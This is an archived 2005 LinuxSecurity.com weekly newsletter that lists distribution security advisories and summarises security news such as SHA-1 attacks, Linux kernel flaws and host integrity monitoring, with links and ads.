+---------------------------------------------------------------------+ | LinuxSecurity.com Weekly Newsletter | | August 29th, 2005 Volume 6, Number 36n | | | | Editorial Team: Dave Wreski dave@private | | Benjamin D. Thomas ben@private | +---------------------------------------------------------------------+ Thank you for reading the LinuxSecurity.com weekly security newsletter. The purpose of this document is to provide our readers with a quick summary of each week's most relevant Linux security headlines. This week, perhaps the most interesting articles include "Storm brewing over SHA-1 as further breaks are found," "Linux Kernel Denial of Service and IPsec Policy Bypass," and "Information Security in Campus and Open Environments. --- ## Master of Science in Information Security ## Earn your Master of Science in Information Security online from Norwich University. Designated a "Center of Excellence", the program offers a solid education in the management of information assurance, and the unique case study method melds theory into practice. Using today's e-Learning technology, you can earn this esteemed degree, without disrupting your career or home life. LEARN MORE: http://www.msia.norwich.edu/linux_en --- LINUX ADVISORY WATCH This week, advisories were releaed for bluez-utils, thunderbird, mysql, epiphany, system-config-netboot, kdbg, doxygen, kdeedu, ncpfs, gaim, system-config-bind, tar, vnc, metacity, cups, pygtk, slocate, myodbc, xpdf, libgal2, dhcpv, diskdumputils, kdebase, cvs, hwdata, eject, pcre, kismet, wikiwiki, apache, tor, netpbm, vim, and elm. The distributors include Debian, Fedora, Gentoo, and Red Hat. http://www.linuxsecurity.com/content/view/120226/150/ --- Hacks From Pax: PHP Web Application Security By: Pax Dickinson Today on Hacks From Pax we'll be discussing PHP web application security. PHP is a great language for rapidly developing web applications, and is very friendly to beginning programmers, but some of its design can make it difficult to write web apps that are properly secure. We'll discuss some of the main security "gotchas" when developing PHP web applications, from proper user input sanitization to avoiding SQL injection vulnerabilities. http://www.linuxsecurity.com/content/view/120043/49/ --- Network Server Monitoring With Nmap Portscanning, for the uninitiated, involves sending connection requests to a remote host to determine what ports are open for connections and possibly what services they are exporting. Portscanning is the first step a hacker will take when attempting to penetrate your system, so you should be preemptively scanning your own servers and networks to discover vulnerabilities before someone unfriendly gets there first. http://www.linuxsecurity.com/content/view/119864/150/ --- >> The Perfect Productivity Tools << WebMail, Groupware and LDAP Integration provide organizations with the ability to securely access corporate email from any computer, collaborate with co-workers and set-up comprehensive addressbooks to consistently keep employees organized and connected. http://ads.linuxsecurity.com/cgi-bin/newad_redirect.pl?id=gdn05 --> Take advantage of the LinuxSecurity.com Quick Reference Card! --> http://www.linuxsecurity.com/docs/QuickRefCard.pdf +---------------------+ | Security News: | <<-----[ Articles This Week ]---------- +---------------------+ * Storm brewing over SHA-1 as further breaks are found 24th, August, 2005 Three Chinese researchers have further refined an attack on the encryption standard frequently used to digitally sign documents, making the attack 64 times faster and leaving cryptographers to debate whether the standard, known as the Secure Hash Algorithm, should be phased out more quickly than planned. http://www.linuxsecurity.com/content/view/120200 * Storage and data encryption 25th, August, 2005 Data security is a major concern for all CIOs. This has been addressed from access and identity controls through encrypting data in transmission through to securing data at rest, on disk or on tape. http://www.linuxsecurity.com/content/view/120211 * Host Integrity Monitoring Using Osiris and Samhain 22nd, August, 2005 Host integrity monitoring is the process by which system and network administrators validate and enforce the security of their systems. This can be a complex suite of approaches, tools, and methodologies, and it can be as simple as looking at loggin output. In the past, tools like Tripwire were used to check the configurations on hosts. The freeware version of this tool was limited in its manageability, which was available mainly in the commercial version. http://www.linuxsecurity.com/content/view/120181 * Why You Need To Add .Protect Domain Name. To The Security Checklist 25th, August, 2005 Domain name hijacking broadly refers to acts where a registered domain name is misused or stolen from the rightful name holder. A domain hijacking is a security risk many organizations overlook when they develop security policy and business continuity plans. While name holders can take measures to protect their domain names against theft and loss, many measures are not generally known. http://www.linuxsecurity.com/content/view/120214 * Linux/Unix e-mail flaw leaves system open to attack 26th, August, 2005 Two serious security flaws have turned up in software widely distributed with Linux and Unix. The bugs affect Elm (Electronic Mail for Unix), a venerable e-mail client still used by many Linux and Unix sysadmins, and Mplayer, a cross-platform movie player that is one of the most popular of its kind on Linux. http://www.linuxsecurity.com/content/view/120230 * Linux Kernel Denial of Service and IPsec Policy Bypass 25th, August, 2005 Two vulnerabilities have been reported in the Linux kernel, which can be exploited by malicious, local users to cause a DoS (Denial of Service) or bypass certain security restrictions. http://www.linuxsecurity.com/content/view/120212 * Flexible, safe and secure? 24th, August, 2005 <a href="http://www.net-security.org/article.php?id=812">This article</a> looks beyond the hype of mobile working to consider some of the practical issues of an organisation implementing an ICT strategy that ensures data security wherever employees connect to corporate systems. http://www.linuxsecurity.com/content/view/120085 * Information Security in Campus and Open Environments 23rd, August, 2005 This article is geared towards techies at libraries and schools and will attempt to address common security problems that may pop up at these institutions. The author gears the solutions towards Open Source, freeware, and base operating system security in a Windows XP/2k environment. http://www.linuxsecurity.com/content/view/120186 * Legal disassembly 23rd, August, 2005 The question for security researchers going forward is modeled by the Lynn saga. Is it legal to decompile source code to find vulnerabilities? Of course, the answer is mixed. Maybe it is, maybe it's not. http://www.linuxsecurity.com/content/view/120188 * Be prepared to pay for security 24th, August, 2005 When one million of your customers have their IP addresses added to a spam blacklist, there is clearly something wrong with your security systems. Just ask Telewest, this is exactly what it experienced in May after 17,000 of its users saw their computers turn into spam bots. http://www.linuxsecurity.com/content/view/120198 * Banks Abandoning SSL On Home Page Log-Ins 24th, August, 2005 Some of the biggest banks have abandoned the practice of posting their online account log-in screens on SSL-protected pages in an effort to boost page response time and guide users to more memorable URLs, a U.K. Web performance firm said Tuesday. http://www.linuxsecurity.com/content/view/120201 * The Real Problem of Linux: The Userbase? 25th, August, 2005 True, a normal Linux installation and setting up basic internet access and email settings is proven to be equally easy under Windows as under Linux- if not easier under Linux. But I've been using Linux distributions for several years now, and I must say that for advanced problems it's harder to get things worked out under Linux. http://www.linuxsecurity.com/content/view/120210 * Industry Survey Shows SMBs Lack Minimal Security 25th, August, 2005 Sean Stenovich often sees his small and midsize business clients pick and choose their security solutions based on what they think they need and can afford. http://www.linuxsecurity.com/content/view/120215 * Sarbanes-Oxley will be 2005's biggest time waster 23rd, August, 2005 The Sarbanes-Oxley rules will be the biggest waste of IT resources for public companies this year, according to a poll of 444 US companies by IBM user group Share. http://www.linuxsecurity.com/content/view/120187 * Hacker underground erupts in virtual turf wars 24th, August, 2005 In the early days of computer attacks, when bright teens could bring down corporate systems, the point was often to trumpet a hacker's success. No longer. http://www.linuxsecurity.com/content/view/120199 ------------------------------------------------------------------------ Distributed by: Guardian Digital, Inc. LinuxSecurity.com To unsubscribe email newsletter-request@private with "unsubscribe" in the subject of the message. ------------------------------------------------------------------------ _________________________________________ Attend ToorCon Sept 16-18th, 2005 Convention Center San Diego, California www.toorcon.org
This archive was generated by hypermail 2.1.3 : Mon Aug 29 2005 - 11:50:43 PDT